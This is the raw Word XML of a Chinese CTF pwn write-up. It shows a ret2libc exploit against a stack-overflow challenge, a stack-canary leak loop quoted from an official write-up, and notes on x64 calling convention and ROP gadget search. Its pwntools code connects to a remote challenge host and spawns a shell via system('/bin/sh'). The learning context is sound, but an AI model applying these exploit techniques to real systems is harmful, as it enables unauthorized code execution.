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04AB" w14:textId="696C5489" w:rsidR="00D44FD0" w:rsidRDefault="00D44FD0" w:rsidP="00D44FD0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先checksec一下文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F9B9E0B" wp14:editId="515E6D40">
            <wp:extent cx="5274310" cy="1959610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="9585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1293" w14:textId="3FFA9BE2" w:rsidR="00D44FD0" w:rsidRDefault="00D44FD0" w:rsidP="00D44FD0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放到64位ida看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44FD0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C3B05BF" wp14:editId="6B84469C">
            <wp:extent cx="5274310" cy="4235450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1995839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8F1C" w14:textId="2F81AA16" w:rsidR="00D44FD0" w:rsidRDefault="00D44FD0" w:rsidP="00D44FD0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shift+f12</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44FD0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C66E3F0" wp14:editId="2DE16A10">
            <wp:extent cx="5274310" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="44032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CCE1" w14:textId="7108E879" w:rsidR="00D44FD0" w:rsidRDefault="00D44FD0" w:rsidP="00D44FD0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很简单感觉选项1puts是输入，然后选项2read是读取，所以很简单的溢出，然后先试试asm，再试试libc，然后最后实在不行我在看别的想法，但是这道题给了libc文件所以第二种方法我感觉可能性最大，看一下</w:t>
      </w:r>
      <w:r w:rsidR="0087624D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C674BB" w14:textId="7E8950B5" w:rsidR="00B644EF" w:rsidRDefault="00B644EF" w:rsidP="00B644EF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下我写的脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E6C91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1DB7A642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2971F291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context.arch = 'amd64'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13736E2F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context.log_level = 'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56BBD1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70702A59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 = remote('61.147.171.103', 51114)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1587FA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elf = ELF("./2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470E4E2C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libc = ELF("./libc-2.23.so")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD9CB59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605AD53F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puts_plt = elf.plt["puts"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3A968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puts_got = elf.got["puts"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276B440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start = elf.sym["start"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEDE14C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pop_rdi = 0x400a93</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E92FF3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3AE14330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p.sendlineafter('&gt;&gt; ', b'1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB4DF8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p.sendline(b'a' * 136)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4B1282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p.sendlineafter('&gt;&gt; ', b'2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51120953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3BFC97FC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offset = 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F686D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payload1 = b"A" * offset </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B35FB2F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payload1 += p64(pop_rdi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F20EE5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p64(puts_got)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01323259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p64(puts_plt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC23AEC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payload1 += p64(start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5B7197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122164A2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p.sendline(payload1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261E45DD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726AECCC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p.recvuntil(b'\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0B5330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puts_addr = u64(p.recvline().strip().ljust(8, b"\x00"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C82FC54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log.info(f"puts address: {hex(puts_addr)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5816FC94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04E4A059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libc_base = puts_addr - libc.symbols["puts"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E81CFF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system_addr = libc_base + libc.symbols["system"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AD31FC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bin_sh_addr = libc_base + next(libc.search(b"/bin/sh"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F63781A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460331F8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log.info(f"libc base: {hex(libc_base)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0DD9A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log.info(f"system address: {hex(system_addr)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D61FCA4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log.info(f"bin_sh address: {hex(bin_sh_addr)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4325F30C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21E9FA8A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p.sendlineafter('&gt;&gt; ', b'1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283D382E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p.sendline(b'a' * 136)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA11174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p.sendlineafter('&gt;&gt; ', b'2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712779B0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12743A05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payload2 = b"A" * offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE286A5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p64(pop_rdi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00541D98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p64(bin_sh_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360005CB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payload2 += p64(system_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EB11B8" w14:textId="77777777" w:rsidR="00B644EF" w:rsidRDefault="00B644EF" w:rsidP="00B644EF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1380F6" w14:textId="77777777" w:rsidR="00B644EF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p.sendline(payload2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1AA06E" w14:textId="29470AED" w:rsidR="00B644EF" w:rsidRDefault="00B644EF" w:rsidP="00B644EF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777D911A" w14:textId="1C94E3E5" w:rsidR="00F53187" w:rsidRDefault="00B644EF" w:rsidP="00B644EF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是我写的脚本，怎么打不通，原来是我忘了又canary这个东西，看一下官方的wp吧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F78CD4" w14:textId="77777777" w:rsidR="00F53187" w:rsidRDefault="00F5318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1ABF2F7" w14:textId="2A5E7605" w:rsidR="00B644EF" w:rsidRPr="00F53187" w:rsidRDefault="00F53187" w:rsidP="00B644EF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>看一下找canary的方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F53187">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="226741A8" wp14:editId="769D3984">
            <wp:extent cx="5274310" cy="795655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1357217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187">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04E25BA3" wp14:editId="57F4C66B">
            <wp:extent cx="5274310" cy="478155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1127082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82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5F90" w14:textId="3A7BBB14" w:rsidR="00F53187" w:rsidRDefault="00F53187" w:rsidP="00B644EF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这就是canary值的地方</w:t>
      </w:r>
      <w:r w:rsidR="00E447BC" w:rsidRPr="00E447BC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37C4B9CB" wp14:editId="5A8DFEBD">
            <wp:extent cx="5274310" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="48210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3112" w14:textId="664C9B34" w:rsidR="00E447BC" w:rsidRDefault="00E447BC" w:rsidP="00E447BC">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为是看到了xor异或函数，这里解释一下fs：28h是在线程区偏移量为0x28的地方来进行读取数据，放到rax上，然后于我们栈上的</w:t>
      </w:r>
      <w:r w:rsidR="004F5B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payloadeax进行比较。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD68D98" w14:textId="1298676D" w:rsidR="004F5B69" w:rsidRDefault="004F5B69" w:rsidP="00E447BC">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们现在知道了rbp+8字节的地方，他与s数组的距离是0x88，ok然后就很简单了因为在0x89就是canary值，我们把它取出来保存好就ok了，因为每次都变就用一个函数处理就ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC4EA9F" w14:textId="351AFCA0" w:rsidR="004F5B69" w:rsidRDefault="000478BC" w:rsidP="00E447BC">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我讲解一下为什么不能在0x88后直接取8个字节就是canary值了，是因为canary值不会直接输出来，而是作为一个标准放在那，我们要想办法通过手段拿到这个标准</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAF7CDD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#0x88过后0x89开始便是canary，但由于0x89可能是0,为了利用put泄露canary，我们就先将这里覆盖为aa   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495616C8" w14:textId="77777777" w:rsidR="0070700A" w:rsidRDefault="0070700A" w:rsidP="0070700A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload = 'a'*(0x88)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B4D119" w14:textId="77777777" w:rsidR="0070700A" w:rsidRDefault="0070700A" w:rsidP="0070700A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C668C6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c = ''   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AE52B8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#覆盖canary的前导0   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A807B4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for i in range(0,8):   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463C5A55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sh.send(payload+'a'*i)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146255D5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sh.recvuntil('&gt;&gt; ')   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8395E3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sh.sendline('2')   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219E036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sh.recv(0x88+i)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB3AAD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c = sh.recvuntil('\n').split('\n')[0]   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6EE7F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   print c   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB823FB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l = len(c)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F48FD3F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if l &gt; 4: #长度大于我们发送的字符串长度，说明数据已经暴露出来了   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E28220A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  break;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AED6C3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sh.recvuntil('&gt;&gt; ')   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2271DDDE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sh.sendline('1')   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05595E20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#print c   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CA83F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#补齐8字节   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594F62AF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for j in range(0,i):   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589BFB2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c = '\x00' + c   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208BEDA0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3327E46C" w14:textId="77777777" w:rsidR="0070700A" w:rsidRDefault="0070700A" w:rsidP="0070700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#取前8字节数据，这才是canary   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E88B8D" w14:textId="1C72E026" w:rsidR="009C0C93" w:rsidRDefault="0070700A" w:rsidP="0070700A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">c = c[0:8]   </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="72AF1D4E" w14:textId="23B1F9F3" w:rsidR="0070700A" w:rsidRDefault="0070700A" w:rsidP="0070700A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个就是拿到canary的方法，后面的方法和我写的是一样的，但这个canary值很麻烦就是我有很多问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD0E5C" w14:textId="1E47A96B" w:rsidR="0070700A" w:rsidRDefault="0070700A" w:rsidP="0070700A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为什么canary的第一位是/x00</w:t>
      </w:r>
      <w:r w:rsidR="00AB78F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7E4584" w14:textId="080F0A70" w:rsidR="000263B6" w:rsidRPr="00116B99" w:rsidRDefault="000263B6" w:rsidP="000263B6">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止格式化字符串直接把canary泄露出来，因为printf遇到/x00的时候就截止了，就不会再输出数据了</w:t>
      </w:r>
      <w:r w:rsidR="00116B99" w:rsidRPr="00116B99">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="441024AF" wp14:editId="7BBE569D">
            <wp:extent cx="5274310" cy="2992120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2082396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005" w14:textId="6E89246F" w:rsidR="0070700A" w:rsidRDefault="0070700A" w:rsidP="0070700A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>canary的中间如果出现/x00怎么办</w:t>
      </w:r>
      <w:r w:rsidR="00AB78F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="4A8594C9" w14:textId="1585A251" w:rsidR="00485328" w:rsidRDefault="000263B6" w:rsidP="00485328">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大概率不会出现这种情况</w:t>
      </w:r>
      <w:r w:rsidR="00485328">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即使出现我们接收的数据是按字节来算而不是截至于/x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAC32EB" w14:textId="32E76967" w:rsidR="0070700A" w:rsidRDefault="00AB78F4" w:rsidP="0070700A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="OLE_LINK2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Canary是在栈上的值不是一个数据怎么回显？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D6892" w14:textId="350A34D2" w:rsidR="00485328" w:rsidRDefault="00485328" w:rsidP="00485328">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Recv函数不是拿到栈上的值，而是你把栈上的值拿出来进行记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C5E76A" w14:textId="02CD181E" w:rsidR="00AB78F4" w:rsidRDefault="00AB78F4" w:rsidP="00AB78F4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK3"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果期间没有/x00那为什么我们覆盖掉第一个/x00直接看后面的值，为什么还要一个一个覆盖？</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="01589B24" w14:textId="77777777" w:rsidR="00AB78F4" w:rsidRDefault="00AB78F4" w:rsidP="00AB78F4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725CB7B7" w14:textId="67B7879C" w:rsidR="00AB78F4" w:rsidRDefault="00ED67E6" w:rsidP="00AB78F4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们看一下高端的写法吧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE49E7" w14:textId="77777777" w:rsidR="00ED67E6" w:rsidRPr="00ED67E6" w:rsidRDefault="00ED67E6" w:rsidP="00ED67E6">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED67E6">
        <w:lastRenderedPageBreak/>
        <w:t>p.sendlineafter('&gt;&gt; ','1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C5F0D7" w14:textId="77777777" w:rsidR="00ED67E6" w:rsidRPr="00ED67E6" w:rsidRDefault="00ED67E6" w:rsidP="00ED67E6">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED67E6">
        <w:t>p.sendline('a'*0x88)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB564B6" w14:textId="77777777" w:rsidR="00ED67E6" w:rsidRPr="00ED67E6" w:rsidRDefault="00ED67E6" w:rsidP="00ED67E6">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED67E6">
        <w:t>p.sendlineafter('&gt;&gt; ','2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE57694" w14:textId="77777777" w:rsidR="00ED67E6" w:rsidRPr="00ED67E6" w:rsidRDefault="00ED67E6" w:rsidP="00ED67E6">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED67E6">
        <w:t>p.recvuntil('a'*0x88+'\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003BF229" w14:textId="6A02EB26" w:rsidR="00ED67E6" w:rsidRDefault="00ED67E6" w:rsidP="00ED67E6">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED67E6">
        <w:t>canary=u64(p.recv(7).rjust(8,'\x00'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68078AB5" w14:textId="27BD1EAC" w:rsidR="00ED67E6" w:rsidRDefault="00ED67E6" w:rsidP="00ED67E6">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是我日常的写法，就是占满在0x89开始拿canary值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D103590" w14:textId="26F9BD9C" w:rsidR="00AB78F4" w:rsidRDefault="00AB78F4" w:rsidP="00AB78F4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有个有趣的知识点是另一种方法来找rop链，我一般找rop链是通过指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB78F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ROPgadget --binary pwn | grep "pop rsi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接在ubuntu里面找</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B1AE3" w14:textId="0AD837CA" w:rsidR="00AB78F4" w:rsidRDefault="00AB78F4" w:rsidP="00AB78F4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下官方的做法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D34B71" w14:textId="77777777" w:rsidR="00AB78F4" w:rsidRDefault="00AB78F4" w:rsidP="00AB78F4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB78F4">
        <w:t xml:space="preserve">X64 传参的方式 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064EA3BD" w14:textId="382F260B" w:rsidR="00AB78F4" w:rsidRDefault="00AB78F4" w:rsidP="00AB78F4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB78F4">
        <w:t>当参数少于7个时， 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE9BFA5" w14:textId="38574238" w:rsidR="000263B6" w:rsidRDefault="000263B6" w:rsidP="00AB78F4">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击alt+t然后搜索pop就可以找到这个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3954DF" w14:textId="2764B532" w:rsidR="000263B6" w:rsidRDefault="000263B6" w:rsidP="00AB78F4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000263B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D880CCA" wp14:editId="475F821D">
            <wp:extent cx="4127500" cy="2077167"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1386397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7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8855" cy="20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6B65" w14:textId="57255266" w:rsidR="00AB78F4" w:rsidRPr="00AB78F4" w:rsidRDefault="000263B6" w:rsidP="00AB78F4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击r15的时候右键点击undefine</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AB78F4" w:rsidRPr="00AB7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0E70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35043B7C"/>
    <w:lvl w:ilvl="0" w:tplc="2988B5B4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DD94F64"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06507C34"/>
    <w:lvl w:ilvl="0" w:tplc="E45087B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8510261">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="55477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D0"/>
    <w:rsid w:val="000263B6"/>
    <w:rsid w:val="000478BC"/>
    <w:rsid w:val="00116B99"/>
    <w:rsid w:val="003B1607"/>
    <w:rsid w:val="00485328"/>
    <w:rsid w:val="004E3902"/>
    <w:rsid w:val="004F5B69"/>
    <w:rsid w:val="0070700A"/>
    <w:rsid w:val="0087624D"/>
    <w:rsid w:val="009C0C93"/>
    <w:rsid w:val="00AB78F4"/>
    <w:rsid w:val="00B644EF"/>
    <w:rsid w:val="00D44FD0"/>
    <w:rsid w:val="00E447BC"/>
    <w:rsid w:val="00ED67E6"/>
    <w:rsid w:val="00F5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D56C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1534A57E-6FF5-49ED-8035-C70B2FD4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F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F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F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F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F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F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F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F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F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F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F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F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F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F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4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6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2025-10-21T12:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-21T16:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>